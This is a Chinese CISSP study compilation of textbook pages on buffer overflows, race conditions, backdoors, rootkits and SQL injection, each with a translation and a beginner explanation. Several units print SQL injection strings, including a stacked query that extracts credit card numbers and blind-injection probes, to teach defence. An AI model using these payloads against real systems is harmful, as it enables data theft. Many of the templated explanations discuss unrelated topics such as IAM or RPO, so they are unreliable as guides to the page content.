事件响应 事件响应是发现、遏制、根除、恢复并复盘安全事件的过程。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 23 / PDF P1417

第 1417 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

the end of the memory space reserved for that variable, potentially corrupting other data stored in memory. In the worst case, that data can be used to overwrite system commands, allowing an attacker to exploit the buffer overflow vulnerability to execute targeted commands on the server. When creating software, developers must pay special attention to variables that allow user input. Many programming languages do not enforce size limits on variables intrinsically—they rely on the programmer to perform this bounds-checking in the code. This is an inherent vulnerability because many programmers feel parameter checking is an unnecessary burden that slows down the development process.

As a security practitioner, it's your responsibility to ensure that developers in your organization are aware of the risks posed by buffer overflow vulnerabilities and that they take appropriate measures to protect their code against this type of attack. Any time a program variable allows user input, the programmer should take steps to ensure that each of the following conditions is met: The user can't enter a value longer than the size of any buffer that will hold it (for example, a 10-letter word into a 5-letter string variable). The user can't enter an invalid value for the variable types that will hold it (for example, a letter into a numeric variable).

The user can't enter a value that will cause the program to operate outside its specified parameters (for example, answer a “yes” or “no” question with “maybe”). Failure to perform simple checks to make sure these conditions are met can result in a buffer overflow vulnerability that may cause the system to crash or even allow the user to execute shell commands and gain access to the system. Buffer overflow vulnerabilities are especially prevalent in code developed rapidly for the web using Common Gateway Interface (CGI) or other languages that allow unskilled programmers to quickly create interactive web pages.

Most buffer overflow vulnerabilities are mitigated with patches provided by software and operating system vendors, magnifying the importance of keeping systems and software up-to-date. Time of Check to Time of Use Computer systems perform tasks with rigid precision. Computers excel at repeatable tasks. Attackers can develop attacks based on the predictability of

中文直译 / 整理

该变量所保留内存空间的末尾,从而可能破坏内存中存储的其他数据。 在最糟 糕的情况下,这些数据可用于覆盖系统命令,使攻击者能够利用缓冲区溢出漏 洞在服务器上执行目标命令。 在开发软件时,开发人员必须特别关注允许用户输入的变量。 许多编程语言本 身并不对变量的大小施加限制——它们依赖程序员在代码中执行边界检查。 这 是一种固有的漏洞,因为许多程序员认为参数检查是一种不必要的负担,会拖 慢开发进程。 作为安全从业者,你的 责任是确保你所在组织的开发人员了解缓冲区溢出漏洞所带来的风险,并采取 适当措施保护其代码免受此类攻击。 每当程序变量允许用户输入时,程序员都应采取措施确保满足以下每一项条件: 用户输入的值不能超过用于存储它的任何缓冲区的大小(例如,将一个10 个字母的单词输入到一个5个字母的字符串变量中)。 用户输入的值不能是用于存储它的变量类型所不允许的(例如,将一个字母 输入到数值型变量中)。 用户输入的值不能导致程序超出其指定的参数范围(例如,对一个 “是”或“否”问题回答“可能”)。 未能执行简单的检查以确保这些条件得到满足,可能导致缓冲区溢出漏洞,进 而导致系统崩溃,甚至允许用户执行shell命令并获取系统访问权限。

缓冲区溢 出漏洞在使用公共网关接口(CGI)或其他允许非专业程序员快速创建交互式 网页的语言中快速开发的Web代码中尤为普遍。 大多数缓冲区溢出漏洞可通过 软件和操作系统供应商提供的补丁得到缓解,这凸显了保持系统和软件更新的 重要性。 检查时间到使用时间 计算机系统以严格的精确性执行任务。 计算机擅长处理可重复的任务。 攻击者可 以基于其可预测性开发攻击

小白解释

场景先行:你是公司的安全负责人,正在读第 1417 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

程序:程序是一步一步怎么做。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1417 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
程序 程序是一步一步怎么做。
学习单元 24 / PDF P1418

第 1418 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

task execution. The common sequence of events for an algorithm is to check that a resource is available and then access it if you are permitted. The time of check (TOC) is the time at which the subject checks on the status of the object. There may be several decisions to make before returning to the object to access it. When the decision is made to access the object, the procedure accesses it at the time of use (TOU). The difference between the TOC and the TOU is sometimes large enough for an attacker to replace the original object with another object that suits their own needs.

Time of check to time of use (TOCTTOU or TOC/TOU) attacks are often called race conditions because the attacker is racing with the legitimate process to replace the object before it is used. A classic example of a TOCTTOU attack is replacing a data file after its identity has been verified but before data is read. By replacing one authentic data file with another file of the attacker's choosing and design, an attacker can potentially direct the actions of a program in many ways. Of course, the attacker would have to have in-depth knowledge of the program and system under attack.

Likewise, attackers can attempt to take action between two known states when the state of a resource or the entire system changes. Communication disconnects also provide small windows that an attacker might seek to exploit. Whenever a status check of a resource precedes action on the resource, a window of opportunity exists for a potential attack in the brief interval between check and action. These attacks must be addressed in your security policy and in your security model. TOCTTOU attacks, race condition exploits, and communication disconnects are known as state attacks because they attack timing, data flow control, and transition between one system state to another.

Backdoors Backdoors are undocumented command sequences that allow individuals with knowledge of the backdoor to bypass normal access restrictions. They are often used during the development and debugging process to speed up the workflow and avoid forcing developers to continuously authenticate to the system. Occasionally, developers leave these backdoors in the system after it reaches a production state, either by accident or so they can “take a peek” at their system when it is processing sensitive data to which they should not have access. In addition to backdoors planted by developers, many types of

中文直译 / 整理

任务执行。 算法的常见事件序列是检查资源是否可用,然后在获得许可后访问 它。 检查时间(TOC)是主体检查对象状态的时间。 在返回对象进行访问之前, 可能需要做出多个决策。 当决定访问对象时,程序会在使用时间(TOU)访问 它。 TOC与TOU之间的差异有时足够大,使攻击者能够将原始对象替换为符合 其自身需求的另一个对象。 检查时间到使用时间(TOCTTOU或TOC/TOU)攻 击通常被称为竞争条件,因为攻击者正在与合法进程竞速,以在对象被使用之 前替换它。 TOCTTOU攻击的一个经典示例是在验证数据文件的身份之后、读取数据之 前替换该文件。 通过用攻击者选择并设计的另一个文件替换一个真实的数据 文件,攻击者可能以多种方式引导程序的行为。 当然,攻击者必须对被攻击 的程序和系统有深入的了解。 同样,攻击者可以在资源或整个系统状态发生变化时,尝试在两个已知状态之 间采取行动。 通信断开也会为攻击者提供可利用的小窗口。 每当对资源的状态 检查先于对该资源的操作时,在检查与操作之间的短暂间隔中就会存在潜在攻 击的机会。 这些攻击必须在您的安全策略和安全模型中加以解决。

T OCTTOU攻击、竞争条件利用和通信断开被称为状态攻击,因为它们攻击的是 时间、数据流控制以及系统状态之间的转换。 后门 后门是未经记录的命令序列,允许知晓后门的人绕过正常的访问限制。 它们通 常在开发和调试过程中使用,以加快工作流程并避免迫使开发人员不断向系统 进行身份验证。 有时,开发人员在系统进入生产状态后仍会保留这些后门,要 么是无意中遗留,要么是为了在系统处理他们本无权访问的敏感数据时“窥探” 一下自己的系统。 除了开发人员植入的后门外,许多类型的

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

政策:政策是高层原则,说明必须遵守什么。

程序:程序是一步一步怎么做。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

身份:身份是主体在系统中的标识。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1418 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Policy 高层、强制、稳定;Procedure 具体步骤。

Step-by-step、SOP 常对应 procedure。

网络题先定位层次,再判断协议、设备或攻击位置。

身份管理题要区分识别、认证、授权、审计。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
身份 身份是主体在系统中的标识。
学习单元 25 / PDF P1419

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

malicious code create backdoors on infected systems that allow the developers of the malicious code to remotely access infected systems. No matter how they arise on a system, the undocumented nature of backdoors makes them a significant threat to the security of any system that contains them. Individuals with knowledge of the backdoor may use it to access the system and retrieve confidential information, monitor user activity, or engage in other nefarious acts.

Privilege Escalation and Rootkits Once attackers gain a foothold on a system, they often quickly move on to a second objective—expanding their access from the normal user account they may have compromised to more comprehensive, administrative access. They do this by engaging in privilege escalation attacks. One of the common ways that attackers wage privilege escalation attacks is through the use of rootkits. Rootkits are freely available on the Internet and exploit known vulnerabilities in various operating systems.

Attackers often obtain access to a standard system user account through the use of a password attack or social engineering and then use a rootkit to increase their access to the root (or administrator) level. This increase in access from standard to administrative privileges is known as a privilege escalation attack. Privilege escalation attacks may also be waged using fileless malware, malicious scripts, or other attack vectors. You'll find more coverage of these attacks in Chapter 14, “Controlling and Monitoring Access.” Administrators can take one simple precaution to protect their systems against privilege escalation attacks, and it's nothing new.

Administrators must keep themselves informed about new security patches released for operating systems used in their environment and apply these corrective measures consistently. This straightforward step will fortify a network against almost all rootkit attacks as well as a large number of other potential vulnerabilities. Injection Vulnerabilities Injection vulnerabilities are among the primary mechanisms that attackers use to break through a web application and gain access to the systems supporting that application. These vulnerabilities allow an attacker to supply

中文直译 / 整理

恶意代码会在受感染的系统上创建后门,使恶意代码的开发者能够远程访 问这些受感染的系统。 无论后门如何在系统中出现,其未记录的特性都使其成为包含它的任何系统安 全的重大威胁。 知晓后门的人员可能利用它来访问系统,获取机密信息,监控 用户活动,或从事其他恶意行为。 权限提升与Rootkit 一旦攻击者在系统中站稳脚跟,他们通常会迅速转向第二个目标——将其访问 权限从可能已被攻陷的普通用户账户扩展为更全面的管理员权限。 他们通过进 行权限提升攻击来实现这一点。 攻击者实施权限提升攻击的常见方式之一是使用Rootkit。 Rootkit在互联网上 免费提供,并利用各种操作系统的已知漏洞。 攻击者通常通过密码攻击或社会 工程学获取标准系统用户账户的访问权限,然后使用Rootkit将其权限提升至根 (或管理员)级别。 这种从标准权限到管理员权限的提升被称为权限提升攻击。 权限提升攻击也可能通过无文件恶意软件、恶意脚本或其他攻击向量进行。 您 将在第14章“控制和监控访问”中找到更多关于这些攻击的介绍。 管理员可以采取一项简单的预防措施来保护其系统免受权限提升攻击,这并非 新方法。

管理员必须及时了解其环境中所使用操作系统发布的最新安全补丁, 并一致地应用这些修复措施。 这一简单步骤将增强网络对几乎所有根套件攻击 以及大量其他潜在漏洞的防护能力。 注入漏洞 注入漏洞 是攻击者用来突破Web应用程序并访问支撑该应用程序的系统的最 主要手段之一。 这些漏洞允许攻击者将

小白解释

场景先行:开发团队要上线登录功能。安全不是上线前扫一下漏洞,而是从需求、设计、编码、测试、发布到运维都要参与。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:安全太晚介入,修复成本高,还可能把漏洞带到生产环境。

你作为负责人可以这样想:在 SDLC 早期做威胁建模、代码审查、测试和发布控制。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

标准:标准给出必须满足的最低要求。

程序:程序是一步一步怎么做。

注入攻击:注入攻击把恶意输入当命令或查询执行。

常见误区:不要只靠上线前一次扫描;安全要嵌入整个生命周期。

读完后用一句话复述:如果我是应用安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是应用安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Minimum level、mandatory requirement 常对应 standard。

Step-by-step、SOP 常对应 procedure。

SQL 注入、命令注入常靠输入验证、参数化查询防御。

防恶意代码要结合补丁、最小权限、检测、备份和用户培训。

排除法提醒:不要只靠上线前一次扫描;安全要嵌入整个生命周期。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
注入攻击 注入攻击把恶意输入当命令或查询执行。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 26 / PDF P1420

第 1420 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

some type of code to the web application as input and trick the web server into either executing that code or supplying it to another server to execute. There are a wide range of potential injection attacks. Typically, an injection attack is named after the type of backend system it takes advantage of or the type of payload delivered (injected) onto the target. Examples include SQL injection, Lightweight Directory Access Protocol (LDAP), XML injection, command injection, HTML injection, code injection, and file injection. SQL Injection Attacks Web applications often receive input from users and use it to compose a database query that provides results that are sent back to a user.

For example, consider the search function on an ecommerce site. If a user enters orange tiger pillows in the search box, the web server needs to know what products in the catalog might match this search term. It might send a request to the backend database server that looks something like this: SELECT ItemName, ItemDescription, ItemPrice FROM Products WHERE ItemName LIKE '%orange%' AND ItemName LIKE '%tiger%' AND ItemName LIKE '%pillow%'; This command retrieves a list of items that can be included in the results returned to the end user.

In a SQL injection attack, the attacker might send a very unusual-looking request to the web server, perhaps searching for this: orange tiger pillow'; SELECT CustomerName, CreditCardNumber FROM Orders; -- If the web server simply passes this request along to the database server, it would do this (with a little reformatting for ease of viewing): SELECT ItemName, ItemDescription, ItemPrice FROM Products WHERE ItemName LIKE '%orange%' AND ItemName LIKE '%tiger%' AND ItemName LIKE '%pillow'; SELECT CustomerName, CreditCardNumber FROM Orders; --%' This command, if successful, would run two different SQL queries (separated by the semicolon).

The first would retrieve the product information, and the second would retrieve a listing of customer names and credit card numbers.

中文直译 / 整理

某种类型的代码作为输入提供给Web应用程序,并欺骗Web服务器执行该代码 或将代码提供给另一台服务器执行。 存在多种潜在的注入攻击。 通常,注入攻击以其利用的后端系统类型或注入到 目标的有效载荷类型命名。 示例包括SQL注入、轻量级目录访问协议( LDAP)注入、XML注入、命令注入、HTML注入、代码注入和文件注入。 SQL注入攻击 Web应用程序通常接收用户输入,并使用它来构建数据库查询,以返回结果给 用户。 例如,考虑一个电子商务网站的搜索功能。 如果用户在搜索框中输入 orangetiger pillows,Web服务器需要知道目录中哪些产品可能与此搜索词 匹配。 它可能会向后端数据库服务器发送如下形式的请求: 选择 ItemName、ItemDescription、ItemPrice 从 Products 中,其中 ItemName 包含 'orange' 且 ItemName 包含 'tiger' 且 ItemName 包含 'pillow'; 此命令检索可包含在返回给最终用户的结果中的项目列表。

在SQL注入攻击中,攻 击者可能会向Web服务器发送一个看起来非常异常的请求,例如搜索以下内容: 橙色老虎枕头'; SELECT CustomerName, CreditCardNumber FROM Orders; ‑‑ 如果Web服务器只是将此请求直接传递给数据库服务器,它会这样做(为便于 查看进行了少量格式调整): SELECT ItemName, ItemDescription, ItemPrice FROM Products WHERE ItemName LIKE '%orange%' AND ItemName LIKE '%tiger%' AND ItemName LIKE ' %pillow'; SELECT CustomerName, CreditCardNumber FROM Orders; ‑‑%' 如果此命令成功,将执行两个不同的SQL查询(由分号分隔)。 第一个查询将 检索产品信息,第二个查询将检索客户姓名和信用卡号的列表。

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

程序:程序是一步一步怎么做。

日志:日志记录系统和用户活动,用于监控、审计和调查。

注入攻击:注入攻击把恶意输入当命令或查询执行。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1420 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

日志要保护完整性、时间同步和访问控制。

SQL 注入、命令注入常靠输入验证、参数化查询防御。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
程序 程序是一步一步怎么做。
日志 日志记录系统和用户活动,用于监控、审计和调查。
注入攻击 注入攻击把恶意输入当命令或查询执行。
学习单元 27 / PDF P1421

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

This is just one example of using a SQL injection attack to violate confidentiality restrictions. SQL injection attacks may also be used to execute commands that modify records, drop tables, or perform other actions that violate the integrity and/or availability of databases. In the basic SQL injection attack we just described, the attacker is able to provide input to the web application and then monitor the output of that application to see the result. Although that is the ideal situation for an attacker, many web applications with SQL injection flaws do not provide the attacker with a means to directly view the results of the attack.

However, that does not mean the attack is impossible; it just makes it more difficult. Attackers use a technique called blind SQL injection to conduct an attack even when they don't have the ability to view the results directly. We'll discuss two forms of blind SQL injection: content-based and timing-based. Blind Content-Based SQL Injection In a content-based blind SQL injection attack, the perpetrator sends input to the web application that tests whether the application is interpreting injected code before attempting to carry out an attack. For example, consider a web application that asks a user to enter an account number.

A simple version of this web page might look like the one shown in Figure 21.1. FIGURE 21.1 Account number input page

中文直译 / 整理

这只是使用SQL注入攻击违反保密限制的一个示例。 SQL注入攻击还可用于执 行修改记录、删除表或执行其他破坏数据库完整性/可用性的操作。 在我们刚刚描述的基本SQL注入攻击中,攻击者能够向Web应用程序提供输入, 然后监控该应用程序的输出以查看结果。 尽管这对攻击者来说是最理想的情况, 但许多存在SQL注入漏洞的Web应用程序并不会为攻击者提供直接查看攻击结 果的手段。 然而,这并不意味着攻击不可能实现,只是使其更加困难。 攻击者 使用一种称为盲注SQL注入的技术,在无法直接查看结果的情况下仍能实施攻 击。 我们将讨论两种盲注SQL注入形式:基于内容的和基于时间的。 盲内容型SQL注入 在基于内容的盲SQL注入攻击中,攻击者向Web应用程序发送输入,以测试应 用程序是否在尝试实施攻击前解释了注入的代码。 例如,考虑一个要求用户输 入账户号码的Web应用程序。 这个网页的一个简单版本可能如下图所示图 21.1。 图21.1账户号码输入页面

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

可用性:可用性保证授权用户需要时能及时使用系统和数据。

程序:程序是一步一步怎么做。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

Step-by-step、SOP 常对应 procedure。

SQL 注入、命令注入常靠输入验证、参数化查询防御。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
可用性 可用性保证授权用户需要时能及时使用系统和数据。
程序 程序是一步一步怎么做。
注入攻击 注入攻击把恶意输入当命令或查询执行。
学习单元 28 / PDF P1422

第 1422 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

When a user enters an account number into that page, they would next see a listing of the information associated with that account, as shown in Figure 21.2. FIGURE 21.2 Account information page The SQL query supporting this application might be something similar to this: SELECT FirstName, LastName, Balance FROM Accounts WHERE AccountNumber = '$account'; where the $account field is populated from the input field in Figure 21.1.

In this scenario, an attacker could test for a standard SQL injection vulnerability by placing the following input in the account number field: 52019' OR 1=1;-- If successful, this would result in the following query being sent to the database: SELECT FirstName, LastName, Balance FROM Accounts WHERE AccountNumber = '52019' OR 1=1; --'

中文直译 / 整理

当用户在该页面中输入账户号码后,接下来会看到与该账户相关的信息列表, 如下图所示图21.2。 图 21.2账户信息页面 支持此应用程序的 SQL 查询可能类似于以下内容: SELECT FirstName, LastName, Balance FROM Accounts WHERE AccountNumber = '$account'; 其中 $account 字段来自 图 21.1中的输入字段。 在这种情况下,攻击者可以在 账户号码字段中输入以下内容以测试标准的 SQL 注入漏洞: 52019' OR 1=1;‑‑ 如果成功,这将导致以下查询被发送到数据库: 选择 FirstName, LastName, Balance 从 Accounts 中 WHERE AccountNumber = '52019' 或 1=1; ‑‑'

小白解释

场景先行:开发团队要上线登录功能。安全不是上线前扫一下漏洞,而是从需求、设计、编码、测试、发布到运维都要参与。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:安全太晚介入,修复成本高,还可能把漏洞带到生产环境。

你作为负责人可以这样想:在 SDLC 早期做威胁建模、代码审查、测试和发布控制。

本页术语用人话说:

标准:标准给出必须满足的最低要求。

程序:程序是一步一步怎么做。

注入攻击:注入攻击把恶意输入当命令或查询执行。

常见误区:不要只靠上线前一次扫描;安全要嵌入整个生命周期。

读完后用一句话复述:如果我是应用安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1422 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是应用安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Minimum level、mandatory requirement 常对应 standard。

Step-by-step、SOP 常对应 procedure。

SQL 注入、命令注入常靠输入验证、参数化查询防御。

排除法提醒:不要只靠上线前一次扫描;安全要嵌入整个生命周期。

本页术语拆解
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
注入攻击 注入攻击把恶意输入当命令或查询执行。
学习单元 29 / PDF P1423

第 1423 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

This SELECT query, which includes the OR 1=1 condition, would match all results. However, the design of the web application may ignore any query results beyond the first row. If this is the case, the query would display the same results as shown in Figure 21.2. Although the attacker may not be able to see the results of the query, that does not mean the attack was unsuccessful. However, with such a limited view into the application, it is difficult to distinguish between a well-defended application and a successful attack. The last line of the query, --', is ignored by the database because the -- character sequence indicates a comment that should be ignored during execution.

The purpose of including it in the query is to avoid an error that might be introduced by the leftover apostrophe in the query template. The attacker can perform further testing by taking input that is known to produce results, such as providing the account number 52019 from Figure 21.2 and using SQL that modifies that query to return no results.

For example, the attacker could provide this input to the field: 52019' AND 1=2;-- If the web application is vulnerable to blind SQL injection attacks, it would send the following query to the database: SELECT FirstName, LastName, Balance FROM Accounts WHERE AccountNumber = '52019' AND 1=2; --' This query, of course, never returns any results, because 1 is never equal to 2. Therefore, the web application would return a page with no results, such as the one shown in Figure 21.3.

If the attacker sees this page, they can be reasonably sure that the application is vulnerable to blind SQL injection and can then attempt more malicious queries that alter the contents of the database or perform other unwanted actions.

中文直译 / 整理

此SELECT 查询包含 OR 1=1 条件,将匹配所有结果。 然而,Web 应用程序的 设计可能会忽略第一行之后的任何查询结果。 如果确实如此,该查询将显示 与图 21.2中所示相同的结果。 尽管攻击者可能无法看到查询结果,但这并不 意味着攻击未成功。 然而,由于对应用程序的了解极为有限,很难区分一个 防御良好的应用和一次成功的攻击。 查询的最后一行 --' 会被数据库忽略,因为 -- 字符序列表示在执行期间应 被忽略的注释。 在查询中包含它的目的是避免查询模板中残留的撇号引发错 误。 攻击者可以通过提供已知会产生结果的输入来进一步测试,例如提供账户号 码 52019 来自 图 21.2,并使用修改该查询以返回 无 结果的 SQL。

例如, 攻击者可以在字段中提供以下输入: 52019' AND 1=2;‑‑ 如果 Web 应用程序易受盲 SQL 注入攻击,它将向数据库发送以下查询: SELECT FirstName, LastName, Balance FRO M Accounts WHERE AccountNumber = ' 52019' AND 1=2; ‑‑' 此查询当然不会返回任何结果,因为 1 永远不等于 2。 因此,Web 应用程序将 返回一个无结果的页面,例如图 图 21.3所示。 如果攻击者看到此页面,他们可 以合理地确定应用程序存在盲 SQL 注入漏洞,进而尝试更恶意的查询,以更改 数据库内容或执行其他不需要的操作。

小白解释

场景先行:机房断电,业务部门问多久能恢复、最多会丢多少数据。BCP/DRP 不是背缩写,而是把业务能承受的中断时间和数据损失说清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:只做备份但没测试,真正灾难时可能恢复不了。

你作为负责人可以这样想:先做业务影响分析,再定 RTO/RPO,最后设计备份、冗余和演练。

本页术语用人话说:

程序:程序是一步一步怎么做。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

注入攻击:注入攻击把恶意输入当命令或查询执行。

常见误区:RTO 问时间,RPO 问数据;这两个不要混。

读完后用一句话复述:如果我是业务连续性负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1423 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务连续性负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

RPO 问数据:最多丢到哪个时间点。

SQL 注入、命令注入常靠输入验证、参数化查询防御。

排除法提醒:RTO 问时间,RPO 问数据;这两个不要混。

本页术语拆解
程序 程序是一步一步怎么做。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
注入攻击 注入攻击把恶意输入当命令或查询执行。
学习单元 30 / PDF P1424

第 1424 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

FIGURE 21.3 Account information page after blind SQL injection Blind Timing-Based SQL Injection In addition to using the content returned by an application to assess susceptibility to blind SQL injection attacks, penetration testers may use the amount of time required to process a query as a channel for retrieving information from a database. These attacks depend on delay mechanisms provided by different database platforms. For example, Microsoft SQL Server's Transact-SQL allows a user to specify a command such as this: WAITFOR DELAY '00:00:15' This would instruct the database to wait 15 seconds before performing the next action.

An attacker seeking to verify whether an application is vulnerable to time-based attacks might provide the following input to the account ID field: 52019'; WAITFOR DELAY '00:00:15'; -- An application that immediately returns the result shown in Figure 21.2 is probably not vulnerable to timing-based attacks. However, if the application returns the result after a 15-second delay, it is likely vulnerable.

中文直译 / 整理

图 21.3盲 SQL 注入后的账户信息页面 基于时间的盲SQL注入 除了使用应用程序返回的内容来评估盲SQL注入攻击的脆弱性外,渗透测试人 员还可以利用查询处理所需的时间作为从数据库中检索信息的通道。 这些攻击依赖于不同数据库平台提供的延迟机制。 例如,Microsoft SQL Server的Transact‑SQL允许用户指定如下命令: WAITFOR DELAY '00:00:15' 这将指示数据库在执行下一步操作前等待15秒。 攻击者若要验证应用程序是否 易受基于时间的攻击,可能会在账户ID字段中提供以下输入: 52019'; WAITFOR DELAY '00:00:15'; ‑‑ 一个立即返回图中所示结果的应用程序图 21.2可能不容易受到基于时间的攻 击。 然而,如果应用程序在15秒延迟后才返回结果,则很可能存在漏洞。

小白解释

场景先行:开发团队要上线登录功能。安全不是上线前扫一下漏洞,而是从需求、设计、编码、测试、发布到运维都要参与。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:安全太晚介入,修复成本高,还可能把漏洞带到生产环境。

你作为负责人可以这样想:在 SDLC 早期做威胁建模、代码审查、测试和发布控制。

本页术语用人话说:

渗透测试:渗透测试让可信团队模拟攻击,验证真实防护能不能扛住。

程序:程序是一步一步怎么做。

渗透测试:渗透测试在授权范围内模拟攻击验证风险。

